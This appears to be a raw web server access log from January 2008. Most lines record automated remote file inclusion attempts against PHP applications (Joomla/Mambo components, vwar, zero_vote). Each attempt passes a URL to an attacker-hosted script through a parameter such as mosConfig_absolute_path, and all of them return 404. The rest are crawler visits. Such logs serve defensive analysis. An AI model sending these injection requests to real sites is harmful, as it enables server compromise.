63.238.22.25 - - [03/Jan/2008:17:58:18 -0800] "GET /logs/access_071221.log/skin/zero_vote/setup.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:58:19 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:03:46 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:03:46 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:18:05:51 -0800] "GET /logs/access_071221.log/skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:18:05:52 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.23.206 - - [03/Jan/2008:18:06:34 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.215 - - [03/Jan/2008:18:06:57 -0800] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:18:07:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:18:07:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:18:11:29 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:18:11:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:18:13:20 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:18:13:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:18:14:18 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:18:14:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:18:14:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:18:14:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:18:14:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:18:14:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:18:20:43 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:18:20:43 -0800] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:18:21:58 -0800] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:18:21:58 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:22:23 -0800] "GET /logs/access_071222.log//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:22:23 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:22:23 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:23:14 -0800] "GET /logs/access_071224.log//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:24:33 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:24:34 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:24:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:18:25:21 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.20.28 - - [03/Jan/2008:18:26:54 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
59.106.20.28 - - [03/Jan/2008:18:26:55 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:27:53 -0800] "GET /logs/index.php?abs_path=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:27:53 -0800] "GET /index.php?abs_path=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:18:31:16 -0800] "GET /logs/access_071212.log//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:33:00 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:33:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:18:33:00 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:18:36:46 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:18:36:47 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:18:40:56 -0800] "GET /logs/access_071031.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:18:41:48 -0800] "GET /logs/access_071028.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:18:45:51 -0800] "GET /logs/access_071212.log//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.28.145 - - [03/Jan/2008:18:50:49 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:18:52:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:18:57:00 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:18:57:42 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:18:58:50 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:18:58:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:18:58:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:18:59:34 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:18:59:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:18:59:36 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:19:00:40 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:19:01:54 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:02:03 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:02:04 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:19:03:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:19:03:10 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:08:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:08:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:19:08:56 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:19:08:57 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:19:08:57 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:10:51 -0800] "GET /logs/access_071212.log//skin/zero_vote/ask_password.php?dir=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:19:10:56 -0800] "GET /logs/access_071214.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.247.158.91 - - [03/Jan/2008:19:14:41 -0800] "GET /logs/access_071124.log/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.247.158.91 - - [03/Jan/2008:19:14:41 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.247.158.91 - - [03/Jan/2008:19:14:41 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.247.158.91 - - [03/Jan/2008:19:15:40 -0800] "GET /logs/access_071220.log/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.wordatwork.org/mambots/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:19:16:08 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:19:16:10 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:20:55 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:20:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:20:57 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:20:57 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:22:17 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:19:22:19 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omeanuncio.com/adpics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:19:35:36 -0800] "GET /logs/access_071029.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:19:35:46 -0800] "GET /logs/access_071113.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.128.51.2 - - [03/Jan/2008:19:38:46 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.128.51.2 - - [03/Jan/2008:19:38:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.128.51.2 - - [03/Jan/2008:19:38:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:19:39:34 -0800] "GET /logs/access_070919.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:19:39:39 -0800] "GET /logs/access_071003.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.26.213 - - [03/Jan/2008:19:43:27 -0800] "GET /logs/access_071206.log HTTP/1.0" 200 76911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.241 - - [03/Jan/2008:19:49:25 -0800] "GET /logs/access_070831.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:19:49:45 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:19:49:45 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.143 - - [03/Jan/2008:19:52:35 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 53442 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:19:59:28 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:19:59:28 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:19:59:28 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:00:15 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:00:15 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:00:15 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:01:05 -0800] "GET /logs/access_071220.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:01:47 -0800] "GET /logs/access_071220.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:02:26 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:02:26 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:02:27 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.167 - - [03/Jan/2008:20:02:37 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:20:02:43 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:20:02:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:20:02:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:03:13 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:03:13 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:03:13 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:05:18 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:05:18 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:20:05:18 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:20:07:54 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
